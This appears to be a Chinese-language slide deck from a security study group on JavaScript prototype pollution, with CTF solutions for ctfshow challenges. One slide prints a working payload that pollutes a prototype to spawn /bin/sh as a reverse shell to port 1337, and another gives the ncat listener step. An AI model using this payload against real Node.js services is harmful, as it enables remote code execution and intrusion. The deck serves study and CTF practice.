資安讀書會分享主題

1. UCCU 讀書會 2021/06/20
Jeff
6/21/21
0

2. §JavaScript 特性
§JavaScript Prototype 污染
§Demo
6/21/21 1

3. 6/21/21 2
https://www.anquanke.com/post/id/236182
原型鍊：cat -> Cat.prototype -> Object.prototype -> null
原型鍊污染：修改 Object 的屬性，
讓其他是 Object 實例化的物件也有該屬性

4. 6/21/21 3
§ JavaScript 原型鏈污染
a 未定義
a 被污染
b 污染

5. 6/21/21 4
Web-338
Payload:
{"username":"omg","password":"123","__proto__":{"ctfshow": "36dboy"}}
https://github.com/Stakcery/Web-Security.git

6. 6/21/21 5
https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf

7. 6/21/21 6
https://github.com/Stakcery/Web-Security.git

8. 6/21/21 7
Web-339
Payload:
{"__proto__": {"query": "return (function(){
var net = global.process.mainModule.constructor._load('net’),
cp = global.process.mainModule.constructor._load('child_process’),
sh = cp.spawn('/bin/sh', []);
var client = new net.Socket();
client.connect(1337, '127.0.0.1’,
function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});
return /a/;})();"}}
https://github.com/Stakcery/Web-Security.git
process.mainModule 等同 require

9. 6/21/21 8
https://tari.moe/2021/05/04/ctfshow-nodejs/
1. 先透過 Prototype pollution 污染參數
2. POST IP:port/api 觸發 render
3. Get shell!!! (ncat –lv 1337)

10. 6/21/21 9
先找到 Prototype ，才有機會 RCE
串⼀次沒改到、就再往上串到 null

11. 6/21/21
10

12. 6/21/21
11

13. 6/21/21
12